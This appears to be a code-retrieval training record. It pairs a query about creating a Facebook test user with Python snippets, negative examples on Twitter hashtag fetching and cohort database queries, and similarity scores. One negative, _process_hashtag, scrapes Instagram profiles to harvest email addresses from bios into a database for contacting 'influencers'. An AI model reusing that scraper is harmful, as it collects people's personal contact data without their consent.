"def searchTweets():\n if 'api' not in globals():\n startTwitterApi(getApiKeys(fileName='apiConf2.txt'))\n #SEARCHING TWEETS CONTAINING THE HASHTAG \"#bitcoin\" USING TWEEPY LIBRARY\n myTweets= []\n #words=list(map(str,words))\n if words:\n myQuery=' OR '.join(words)\n else:\n myQuery = '*'\n if removeRetweets:\n myQuery += ' - filter:retweets'\n kwargs['q']=myQuery\n kwargs['count']=100\n kwargs['tweet_mode']='extended'\n if 'startingDate' in kwargs:\n kwargs['since']=kwargs['startingDate']\n del(kwargs['startingDate'])\n if 'endingDate' in kwargs:\n kwargs['until']=kwargs['endingDate']\n del(kwargs['endingDate'])\n if 'maxTweets' in kwargs:\n del(kwargs['maxTweets'])\n if sortBy=='newest':\n for tweet in tweepy.Cursor(api.search, kwargs).items(maxTweets):\n tweet._json['text']=tweet._json['full_text']\n del (tweet._json['full_text'])\n myTweets.append(tweet._json)\n else:\n for tweet in tweepy.Cursor(api.search, kwargs).items():\n tweet._json['text']=tweet._json['full_text']\n del (tweet._json['full_text'])\n myTweets.append(tweet._json)\n return getTopNTweets(myTweets, maxTweets)",
"def get_tweets_by_hashtag_route(hashtag):\n response, code = get_tweets_by_hashtag(\n hashtag, request.args.get('limit', 30))\n return jsonify(response), code",
"def get_hashtag_tweets(self, hashtag,\n count=settings.TWITTER_DEFAULT_LIMIT):\n url = urljoin(self.base_url, \"/search/tweets.json\")\n response = self.session.get(\n url,\n params={\n \"q\": hashtag,\n \"count\": count,\n \"include_entities\": True\n },\n auth=self.__auth,\n )\n data = response.json()\n if response.ok:\n data = [Tweet(tweet_data) for tweet_data in data['statuses']]\n else:\n if 'error' in data:\n raise TwitterException(data['error'], code=response.status_code)\n elif 'errors' in data:\n error = data['errors'][0]\n raise TwitterException(error['message'], code=response.status_code)\n return data",
"def gettweets(request):\n temp = json.loads(request.body)\n print (temp['hashtags'])\n return Response(tw_fetcher.gethashes(temp['hashtags']), status=status.HTTP_201_CREATED)",
"def get_top_hashtags_from_twitter_api(country='Japan', extended_search=True, debug=False):\n trends = get_top_trends_from_twitter(country=country, exclude_hashtags=False)\n trends = json.loads(trends)\n\n trending_hashtags = [t['label'] for t in trends]\n\n #print(json.dumps(trends, indent=4, ensure_ascii=False))\n\n queries = [t['query'] for t in trends]\n\n if debug:\n #[print(x) for x in trends]\n #[print(x) for x in queries]\n queries = [queries[0]]\n\n full_hashtags_list = []\n for query in queries:\n #print(query)\n # there is no country filter, but there is language filter at least\n if country == 'Japan':\n responses = api.GetSearch(term=query, locale='ja', return_json=True)\n try: responses = responses['statuses']\n except: print(responses)\n else:\n responses = api.GetSearch(term=query, return_json=True)\n try: responses = responses['statuses']\n except: print(responses)\n\n #print(json.dumps(responses, indent=4, ensure_ascii=False))\n\n trend_hashtags_list = []\n for response in responses:\n if debug: print(json.dumps(response, indent=4, ensure_ascii=False))\n text = response['text']\n\n hashtags_list = response['entities']['hashtags']\n\n if len(hashtags_list) > 0:\n hashtags_list = [h['text'] for h in hashtags_list]\n [trend_hashtags_list.append(h) for h in hashtags_list]\n\n full_hashtags_list.append(trend_hashtags_list)\n\n flat_hashtags_list = [item for sublist in full_hashtags_list for item in sublist]\n\n # turn it into a set to clear duplicates, then append #\n flat_hashtags_list = list(set(flat_hashtags_list))\n flat_hashtags_list = ['#'+h for h in flat_hashtags_list]\n\n flat_tier_list = []\n for h in flat_hashtags_list:\n if h in trending_hashtags:\n flat_tier_list.append(1)\n else:\n flat_tier_list.append(2)\n\n output = []\n for hashtag, tier in zip(flat_hashtags_list, flat_tier_list):\n output.append({\n \"label\": hashtag,\n \"tier\": tier\n })\n\n sorted_output = sorted(output, key=lambda x: x['tier'])\n\n output_json = json.dumps(sorted_output, ensure_ascii=False)\n return output_json",
"def tweet_split_hashtags(word, append_hashtag):\n if word.startswith('#') and len(word) > 1:\n res = ''\n res += '<hashtag> '\n res += infer_spaces(word[1:])\n if append_hashtag:\n res += ' '\n res += word\n return res\n else:\n return word",
"def add_tweet(self,hash_tag_tuple,epoch_time):\n # Check if tweet is in order, inside the window duration, or outside\n t_diff = self.latest_time - epoch_time > self.t_window\n\n if t_diff <= self.t_window:\n self.latest_time = max(epoch_time,self.latest_time)\n\n current_vertices = self.graph.vs._name_index\n if self.verbose:\n print('Graph name index: '+str(current_vertices))\n print('Graph name index type: '+str(type(current_vertices)))\n\n # current vertivces will have none type when it is initilazed empty\n if current_vertices is not None:\n\n # Add hashtag to graph as vertex, if its already exists, nothing happens\n for hash_tag in hash_tag_tuple:\n # only add hashtag if it isn't already in the graph\n if hash_tag not in current_vertices:\n if self.verbose: print(\"Adding Vertex: \"+str(hash_tag))\n self.graph.add_vertex(name=hash_tag)\n else:\n # Add hashtag to graph as vertex, if its already exists, nothing happens\n for hash_tag in hash_tag_tuple:\n if self.verbose: print(\"Adding Vertex: \"+str(hash_tag))\n self.graph.add_vertex(name=hash_tag)\n\n\n\n # Add edges with associated epoch time\n for edge in combinations(hash_tag_tuple,r=2):\n if self.verbose: print('Adding Edge Pair:'+str(edge)+\" Time:\"+str(epoch_time))\n\n self.graph.add_edge(source=edge[0],target=edge[1],time=epoch_time)\n\n self.trim()\n\n # if tweet is outside of the time window than toss it\n else:\n return\n\n return",
"def hashtags(max: int = None):\n for hashtag in client.hashtags(max=max):\n print(json.dumps(hashtag))",
"def extract_hashtags(tweet):\n tknzr = TweetTokenizer()\n hashtags = [token.lower() for token in tknzr.tokenize(tweet) if re.match(hashtag_re, token)]\n return hashtags",
"def sort_hashtags_by_popularity(tweets: list) -> list:\n hashtags_by_popularity = {}\n pattern = r\"#\\w+\"\n for tweet in tweets:\n find_hashtag = re.findall(pattern, tweet.content)\n if not find_hashtag:\n continue\n else:\n for ht in find_hashtag:\n hashtags_by_popularity.setdefault(ht, []).append(tweet.retweets)\n print(hashtags_by_popularity)\n for k, v in hashtags_by_popularity.items():\n hashtags_by_popularity[k] = sum(v)\n print(hashtags_by_popularity)\n sorted_ht = sorted(hashtags_by_popularity.items(), key=lambda x: x[-1], reverse=True)\n print(hashtags_by_popularity)\n return [ht[0] for ht in sorted_ht]",
"def separate_hastags_mentions_urls(tweet):\n \n text = tweet.lower()\n hashtag_list = re.findall(\"#([a-zA-Z0-9_]{1,50})\", text)\n \n text = re.sub(r'http\\S+', '', text)\n clean_tweet = re.sub(\"@[A-Za-z0-9_]+\",\"\", text)\n clean_tweet = re.sub(\"#[A-Za-z0-9_]+\",\"\", clean_tweet)\n \n return clean_tweet, hashtag_list",
"def queryTerm2Twitter(term): \n statusList = api.GetSearch(term, count=100, result_type='recent')\n timeStampOfStatus = [datetime.fromtimestamp(i.created_at_in_seconds) for i in statusList]\n timeStampOfStatus.sort() \n return timeStampOfStatus[0]",
"def extract_recent_tag(self, tag):\n\n url_string = \"https://www.instagram.com/explore/tags/%s/\" % tag\n response = bs4.BeautifulSoup(requests.get(url_string).text, \"html.parser\")\n potential_query_ids = self.get_query_id(response)\n shared_data = self.extract_shared_data(response)\n\n media = shared_data['entry_data']['TagPage'][0]['tag']['media']\n posts = []\n for node in media['nodes']:\n post = self.extract_recent_instagram_post(node)\n posts.append(post)\n self.save_results(posts)\n\n end_cursor = media['page_info']['end_cursor']\n\n # figure out valid queryId\n for potential_id in potential_query_ids:\n url = \"https://www.instagram.com/graphql/query/?query_id=%s&tag_name=%s&first=12&after=%s\" % (\n potential_id, tag, end_cursor)\n try:\n data = requests.get(url).json()\n if 'hashtag' not in data['data']:\n # empty response, skip\n continue\n query_id = potential_id\n success = True\n break\n except JSONDecodeError as de:\n # no valid JSON retured, most likely wrong query_id resulting in 'Oops, an error occurred.'\n pass\n if not success:\n log.error(\"Error extracting Query Id, exiting\")\n sys.exit(1)\n\n while end_cursor is not None:\n url = \"https://www.instagram.com/graphql/query/?query_id=%s&tag_name=%s&first=12&after=%s\" % (\n query_id, tag, end_cursor)\n data = requests.get(url).json()\n if 'hashtag' not in data['data']:\n # empty response, skip\n continue\n end_cursor = data['data']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']\n posts = self.extract_instagram_posts(data['data']['hashtag']['edge_hashtag_to_media']['edges'])\n self.save_results(posts)",
"def _process_hashtag(hashtag):\r\n\r\n\tglobal total_inserted\r\n\r\n\tsite = requests.get('https://www.instagram.com/explore/tags/{0}/'.format(hashtag))\r\n\tsoup = BeautifulSoup(site.text, 'html.parser')\r\n\t\r\n\tif site.status_code == 404:\r\n\t\tlogging.error('[MISS] Tag not found. Continuing to next tag...')\r\n\t\treturn\r\n\r\n\tshared_data_post = _parse_shared_data(soup)\r\n\ttag_nodes = shared_data_post['entry_data']['TagPage'][0]['tag']['media']['nodes']\r\n\ttag_nodes = sorted(tag_nodes, key=lambda k: k['likes'], reverse=True)\r\n\r\n\tlogging.error('Number of posts: {0}'.format(len(tag_nodes)))\r\n\r\n\tndx = -1\r\n\tfor post in tag_nodes:\r\n\t\tndx += 1\r\n\r\n\t\tif ndx > 50:\r\n\t\t\treturn\r\n\t\t\r\n\t\t# get top posts\r\n\t\tpost_url = 'https://www.instagram.com/p/{0}'.format(post['code'])\r\n\t\tmedia_page = requests.get(post_url)\r\n\t\tsoup = BeautifulSoup(media_page.text, 'html.parser')\r\n\r\n\t\tshared_data_media_page = _parse_shared_data(soup)\r\n\t\ttry:\r\n\t\t\tusername = shared_data_media_page['entry_data']['PostPage'][0]['graphql']['shortcode_media']['owner']['username']\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error('Could not get username from post page. Continuing...')\r\n\t\t\tcontinue\r\n\r\n\t\tprofile_page = requests.get('https://www.instagram.com/{0}/'.format(username))\r\n\r\n\t\tif profile_page.status_code == 404:\r\n\t\t\tlogging.error('{0} leads to a 404 error. Skipping...'.\\\r\n\t\t\t\t\tformat(username))\r\n\r\n\t\tsoup = BeautifulSoup(profile_page.text, 'html.parser')\r\n\r\n\t\tshared_data_user_profile = _parse_shared_data(soup)\r\n\r\n\t\ttry:\r\n\t\t\tis_private = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['is_private']\r\n\t\t\tif is_private:\r\n\t\t\t\tlogging.error('{0} is either unavailable, private, or deactivated. Skipping...'.\\\r\n\t\t\t\t\tformat(username))\r\n\t\t\t\tcontinue\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error(e)\r\n\t\t\tlogging.error('{0} is either unavailable, private, or deactivated. Skipping...'.\\\r\n\t\t\t\t\tformat(username))\r\n\t\t\tcontinue \r\n\r\n\t\tusername = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['username']\r\n\t\tuser_id = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['id']\r\n\t\tuser_bio = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['biography']\r\n\r\n\t\tif not user_bio or user_bio == '':\r\n\t\t\tlogging.error('[MISS] {0} has no bio (therefore no e-mail). Skipping...'.format(username))\r\n\t\t\tcontinue\r\n\r\n\t\tuser_bio = re.sub(r'[^\\x00-\\x7f]', r'', user_bio.encode('utf-8').strip())\r\n\t\temail = re.search(r'[-0-9a-zA-Z.+_]+@[-0-9a-zA-Z.+_]+\\.[a-zA-Z]{2,4}',\r\n\t\t\t\t\tstr(user_bio))\r\n\r\n\t\t# if user has no email, skip\r\n\t\tif email:\r\n\t\t\temail = email.group()\r\n\t\telse:\r\n\t\t\tlogging.error('[MISS] {0} has no email. Skipping...'.format(username))\r\n\t\t\tcontinue\r\n\r\n\t\tlogging.error('{0} has an email!! :-) Processing...'.format(username))\r\n\t\tpost_count = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['media']['count']\r\n\r\n\t\ttry:\r\n\t\t\tfollowers = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['followed_by']['count']\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error('[MISS] Could not get # of followers user profile page. Continuing...')\r\n\t\t\tcontinue\r\n\r\n\t\t# if num followers is less than 100, skip\r\n\t\tif followers < 100:\r\n\t\t\tlogging.error('[MISS] {0} has less than 100 followers. Skipping...'.format(username))\r\n\t\t\tcontinue\r\n\r\n\t\t# check if ig user already exists in database\r\n\t\tig_user = IgUsers.objects.filter(username=username)\r\n\r\n\t\tif ig_user.exists():\r\n\t\t\t# if user exists, update e-mail, post counts, followers, and average likes\r\n\t\t\tig_user = ig_user.first()\r\n\t\telse:\r\n\t\t\t# else create a new user and save into DB\r\n\t\t\tig_user = IgUsers()\r\n\t\t\tig_user.username = username\r\n\t\t\r\n\t\tig_user.email = email\r\n\t\tig_user.followers = followers\r\n\t\tig_user.emailscraped = datetime.datetime.now()\r\n\t\tig_user.postcount = post_count\r\n\t\tig_user.postavglike = _find_avg_likes(shared_data_user_profile)\r\n\t\tig_user.verified = ig_user.verified or 0\r\n\t\tig_user.userid = user_id\r\n\t\tig_user.emailsent = ig_user.verified or 0\r\n\t\tig_user.related_accs_scraped = ig_user.related_accs_scraped or False\r\n\r\n\t\tig_user.save()\r\n\r\n\t\t# now loop through media and grab hashtags\r\n\t\tlogging.error('... now processing hashtags for user {0}'.format(username))\r\n\t\ttry:\t\t\t\r\n\t\t\tmedia_desc = shared_data_media_page['entry_data']['PostPage'][0]['graphql']['shortcode_media']['edge_media_to_caption']['edges'][0]['node']['text']\r\n\t\t\tmedia_desc = re.sub(r'[^\\x00-\\x7f]', r'', media_desc.encode('utf-8').strip())\r\n\t\t\ttmp_hashtag_arr = re.findall(r'#(\\w+)', media_desc)\r\n\t\t\thashtag_arr = []\r\n\t\t\tfor ndx in range(len(tmp_hashtag_arr)):\r\n\r\n\t\t\t\tif len(tmp_hashtag_arr[ndx]) > 1 and not any(char.isdigit() for char in tmp_hashtag_arr[ndx]):\r\n\t\t\t\t\thashtag_arr.append(tmp_hashtag_arr[ndx])\t\t\t\t\t\r\n\r\n\t\t\tif not hashtag_arr:\r\n\t\t\t\thashtag_arr.append(hashtag)\r\n\r\n\t\t\t# now save hashtags\r\n\t\t\tfor tag in hashtag_arr:\r\n\t\t\t\tnew_tag = IgUserTags()\r\n\t\t\t\tnew_tag.userid = user_id\r\n\t\t\t\tnew_tag.hashtag = tag\r\n\t\t\t\tnew_tag.frequency = 0\r\n\t\t\t\tnew_tag.save()\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error(e)\r\n\t\t\tlogging.error('Influencer saved, but unable to save hashtag...!')\r\n\t\t\tprint e\r\n\t\t\tpass\r\n\r\n\t\ttotal_inserted += 1"
] |
[
"0.6311522",
"0.6274851",
"0.6230637",
"0.6107197",
"0.6083219",
"0.60664827",
"0.60491127",
"0.59684294",
"0.59415287",
"0.5937693",
"0.5920222",
"0.5903852",
"0.58821666",
"0.5870542",
"0.5857933",
"0.58483285",
"0.5847059",
"0.5841191",
"0.5840299",
"0.5798845",
"0.57588327",
"0.57424885",
"0.5722008",
"0.5719945",
"0.57003176",
"0.56830096",
"0.5657215",
"0.5650813",
"0.56281734",
"0.5626892"
] |
0.670553
|
0
|
Creates a developer test user with Facebook
|
def create_test_user(self):
response = urllib2.urlopen('https://graph.facebook.com/%s/accounts/test-users?installed=true&name=test_acc&locale=en_US&permissions=publish_stream&method=post&access_token=%s' % (self.consumer_key, self.token))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_39_facebook_oauth_creation(self):\r\n fake_response = {\r\n u'access_token': u'access_token',\r\n u'token_type': u'Bearer',\r\n u'expires_in': 3600,\r\n u'id_token': u'token'}\r\n\r\n fake_user = {\r\n u'username': u'teleyinex',\r\n u'first_name': u'John',\r\n u'last_name': u'Doe',\r\n u'verified': True,\r\n u'name': u'John Doe',\r\n u'locale': u'en_US',\r\n u'gender': u'male',\r\n u'email': u'[email protected]',\r\n u'quotes': u'\"quote',\r\n u'link': u'http://www.facebook.com/johndoe',\r\n u'timezone': 1,\r\n u'updated_time': u'2011-11-11T12:33:52+0000',\r\n u'id': u'11111'}\r\n\r\n from pybossa.view import facebook\r\n response_user = facebook.manage_user(fake_response['access_token'],\r\n fake_user, None)\r\n\r\n user = db.session.query(User).get(1)\r\n\r\n assert user.email_addr == response_user.email_addr, response_user",
"def test_40_facebook_oauth_creation(self):\r\n fake_response = {\r\n u'access_token': u'access_token',\r\n u'token_type': u'Bearer',\r\n u'expires_in': 3600,\r\n u'id_token': u'token'}\r\n\r\n fake_user = {\r\n u'username': u'teleyinex',\r\n u'first_name': u'John',\r\n u'last_name': u'Doe',\r\n u'verified': True,\r\n u'name': u'John Doe',\r\n u'locale': u'en_US',\r\n u'gender': u'male',\r\n u'email': u'[email protected]',\r\n u'quotes': u'\"quote',\r\n u'link': u'http://www.facebook.com/johndoe',\r\n u'timezone': 1,\r\n u'updated_time': u'2011-11-11T12:33:52+0000',\r\n u'id': u'11111'}\r\n\r\n self.register()\r\n self.signout()\r\n\r\n from pybossa.view import facebook\r\n response_user = facebook.manage_user(fake_response['access_token'],\r\n fake_user, None)\r\n\r\n assert response_user is None, response_user",
"def setUp(self):\n self.new_user = User.objects.create_user(first_name='John', last_name='Doe', username='john_doe', email='[email protected]', bio='I am new here.', password='test_password', website='example.com', social_media={\n 'facebook':'Facebook link',\n 'Dribble': 'Dribble link',\n })",
"def create_user(self):\n User.objects.create_user('test', '[email protected]', 'testing')",
"def test_create_user(self):\n \n new_user = {\"username\": \"beny1976\", \"vocab_count\": 0, \"name\": \"beny rood\", \"sex\": \"male\", \"dob\": \"18/10/1979\"}\n msg = app.create_user(predefined_user=new_user)\n self.assertTrue(msg != \"\")",
"def createDeveloper(self):\n self.createUser()\n self.user.is_developer = True\n self.user.put()",
"def sample_user(email=user_v['email'], password=user_v['password']):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n\n return get_user_model().objects.create_user(email, password)",
"def create_test_user(self):\n user = User.objects.create_user(\n username='[email protected]', password='password')\n user.groups.add(self.group)\n user.user_permissions.add(p('wagtailadmin.access_admin'))\n user.save()\n return user",
"def test_able_to_create_a_user():\n response = api_helper.create_user(pytest.test_user)\n assert response.status_code == 201\n check_user_data_in_response(response.json()[\"data\"])",
"def test_create_user(self):\n pass",
"def test_create_user(self):\n pass",
"def test_create_user(self):\n pass",
"def test_good_user_creation(self):\n data = json.dumps({\n \"username\" : \"mark\", \"email\" : \"[email protected]\",\n \"password\" : \"secret12345\", \"confirm_password\" : \"secret12345\"})\n response = self.app.post(\n '/api/v3/users', data=data,\n content_type='application/json',\n headers=self.admin_header)\n self.assertEqual(response.status_code, 201)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def test_createuser():\n url = baseUrl + userurl\n payload = user_payload\n logging.info(\"Create a user: %s\" % payload)\n r = requests.post(url, data=json.dumps(payload), headers=header)\n assert r.status_code == 201\n resp = r.text\n assert resp == 'Success'",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email: str = \"[email protected]\", password: str = \"testpass\"):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='password'):\n return get_user_model().objects.create_user(email, password)",
"def test_create_user(self):\n data = {\n \"firstname\": \"John\",\n \"lastname\": \"Doe\",\n \"password\": \"supersecret\",\n \"password_repeat\": \"supersecret\",\n }\n res = self.post(url=\"/users\", data=data)\n self.assertEqual(res.status_code, 200)\n self.assertIn(b\"Created user.\", res.data)\n\n user = User.query.filter_by(id=6).first()\n self.assertTrue(user)\n self.assertEqual(user.firstname, \"John\")\n self.assertEqual(user.lastname, \"Doe\")\n self.assertFalse(user.is_verified)",
"def create_test_user():\n return User.objects.create(username='test_username', password='test_password')",
"def sample_user(email='[email protected]', password='open@123'):\n return get_user_model().objects.create_user(email, password)",
"def add_testuser(self):\n user = UserFactory.create()\n user.username = 'testuser'\n user.set_password('testuser')\n user.save()\n return user.profile",
"def test_create_user(self):\n first_name = \"b\"\n last_name = \"b\"\n username = \"b\"\n email = \"b\"\n password = \"b\"\n\n manager = UserManager()\n result = manager.create(first_name, last_name, username, email, password)\n self.assertTrue(result)\n\n user = User.objects.get(username=username)\n self.assertEqual(first_name, user.first_name)\n self.assertEqual(last_name, user.last_name)\n self.assertEqual(username, user.username)\n self.assertEqual(email, user.email)\n self.assertEqual(password, user.testdata.password)\n self.assertEqual(username, user.testdata.username)\n self.assertEqual(email, user.testdata.email)\n self.assertNotEqual(user.authtests, None)",
"def sample_user(email=\"[email protected]\",\n password=\"password123\",\n name=\"some name\"):\n return get_user_model().objects.create_user(email=email,\n password=password,\n name=name)",
"def add_testuser(self):\n user = UserFactory.create()\n user.username = 'testuser'\n user.set_password('testuser')\n user.is_active = True\n user.save()\n return user.profile",
"def test_valid_account_create_is_a_developer(self):\n ident_choice = UserIdentificationLabel.objects.get(slug=\"ident1\")\n form_data = {\n 'invitation_code': '1234',\n 'email': '[email protected]',\n 'organization_name': 'transhealth',\n 'password1': 'BEDrocks@123',\n 'password2': 'BEDrocks@123',\n 'first_name': 'Hank',\n 'last_name': 'Flinstone',\n 'identification_choice': str(ident_choice.pk),\n }\n self.client.post(self.url, form_data, follow=True)\n up = UserProfile.objects.get(user__email='[email protected]')\n self.assertEqual(up.user_type, 'DEV')"
] |
[
"0.77105623",
"0.7697404",
"0.7588671",
"0.7400935",
"0.72141296",
"0.7197762",
"0.71746993",
"0.7155389",
"0.71482134",
"0.7129204",
"0.7109574",
"0.7109574",
"0.7109574",
"0.7106927",
"0.7098064",
"0.7098064",
"0.7098064",
"0.708655",
"0.7084253",
"0.70820147",
"0.707454",
"0.7070056",
"0.70351624",
"0.70329624",
"0.702178",
"0.70200443",
"0.700491",
"0.69790685",
"0.6952986",
"0.6940845"
] |
0.7917467
|
0
|
Retrieve all students with the cohort name
|
def all_cohorts(self):
with sqlite3.connect(self.db_path) as conn:
conn.row_factory = lambda cursor, row: Cohort(row [1])
db_cursor = conn.cursor()
db_cursor.execute("""
select c.id,
c.name
from cohorts c
order by c.name
""")
all_cohorts = db_cursor.fetchall()
print('\n***All Cohorts***')
for cohort in all_cohorts:
print(cohort)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def all_cohorts(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Cohort(\n row[1]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select cohort.Id,\n Name\n from cohort\n \"\"\")\n\n all_cohorts = db_cursor.fetchall()\n\n for cohort in all_cohorts:\n print(cohort)",
"def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)",
"def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n for student in all_students:\n print(student)",
"def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)",
"def users_in_cohort(request, course_key, cohort_id):\r\n # this is a string when we get it here\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_key)\r\n\r\n get_course_with_access(request.user, 'staff', course_key)\r\n\r\n # this will error if called with a non-int cohort_id. That's ok--it\r\n # shoudn't happen for valid clients.\r\n cohort = cohorts.get_cohort_by_id(course_key, int(cohort_id))\r\n\r\n paginator = Paginator(cohort.users.all(), 100)\r\n page = request.GET.get('page')\r\n try:\r\n users = paginator.page(page)\r\n except PageNotAnInteger:\r\n # return the first page\r\n page = 1\r\n users = paginator.page(page)\r\n except EmptyPage:\r\n # Page is out of range. Return last page\r\n page = paginator.num_pages\r\n contacts = paginator.page(page)\r\n\r\n user_info = [{'username': u.username,\r\n 'email': u.email,\r\n 'name': '{0} {1}'.format(u.first_name, u.last_name)}\r\n for u in users]\r\n\r\n return json_http_response({'success': True,\r\n 'page': page,\r\n 'num_pages': paginator.num_pages,\r\n 'users': user_info})",
"def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)",
"def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)",
"def get_cohort_by_name(course_key, name):\r\n return CourseUserGroup.objects.get(\r\n course_id=course_key,\r\n group_type=CourseUserGroup.COHORT,\r\n name=name\r\n )",
"def get_course_cohort_names(course_key):\r\n return [c.name for c in get_course_cohorts(course_key)]",
"def get_cohort_users(self, cohort):\n\t\tusers = []\n\t\tfor user, reg_date in self.customers.items():\n\t\t\tif self.is_cohort_user(cohort, reg_date):\n\t\t\t\tusers.append(user)\n\t\treturn users",
"def get_campus_students(session, school):\n # Parameter to avoid getting staff users\n parameters = {'filter[staff?]': False}\n users = get_all_pages(session, f'/campus/{school}/users', 100, params=parameters)\n ids = []\n\n for user in users:\n # Check that the user is not anonymized by checking first letters of login\n if not user['login'].startswith('3b3-'):\n ids.append(user['id'])\n\n return ids",
"def test_get_cohort(self):\r\n course = modulestore().get_course(self.toy_course_key)\r\n self.assertEqual(course.id, self.toy_course_key)\r\n self.assertFalse(course.is_cohorted)\r\n\r\n user = User.objects.create(username=\"test\", email=\"[email protected]\")\r\n other_user = User.objects.create(username=\"test2\", email=\"[email protected]\")\r\n\r\n self.assertIsNone(get_cohort(user, course.id), \"No cohort created yet\")\r\n\r\n cohort = CourseUserGroup.objects.create(name=\"TestCohort\",\r\n course_id=course.id,\r\n group_type=CourseUserGroup.COHORT)\r\n\r\n cohort.users.add(user)\r\n\r\n self.assertIsNone(get_cohort(user, course.id),\r\n \"Course isn't cohorted, so shouldn't have a cohort\")\r\n\r\n # Make the course cohorted...\r\n self.config_course_cohorts(course, [], cohorted=True)\r\n\r\n self.assertEquals(get_cohort(user, course.id).id, cohort.id,\r\n \"Should find the right cohort\")\r\n\r\n self.assertEquals(get_cohort(other_user, course.id), None,\r\n \"other_user shouldn't have a cohort\")",
"def get_results(self, stud_name):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\n \"SELECT c.naam, e.cijfer, e.ex_datum \"\n \"FROM studenten s \"\n \"INNER JOIN examens e ON e.stud_id = s.stud_id \"\n \"INNER JOIN cursussen c ON c.cur_id = e.cur_id WHERE s.naam = '{0}' \"\n \"ORDER BY e.ex_datum DESC\".format(stud_name))\n self.cur.close()\n\n return self.cur.fetchall()",
"def school_names(request):\n names = models.SchoolDemographics.objects.order_by('name').distinct('name').values_list('name', flat=True)\n return Response(data=names)",
"def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()",
"def get_students(self):\n return u', '.join([c.student.username for c in self.candidates.all()])",
"def all_instructors(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(\n row[0], row[1], row[3], row[4]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.CohortId\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n for instrutor in all_instructors:\n print(instrutor)",
"def get_course_cohorts(course_key):\r\n return list(CourseUserGroup.objects.filter(\r\n course_id=course_key,\r\n group_type=CourseUserGroup.COHORT\r\n ))",
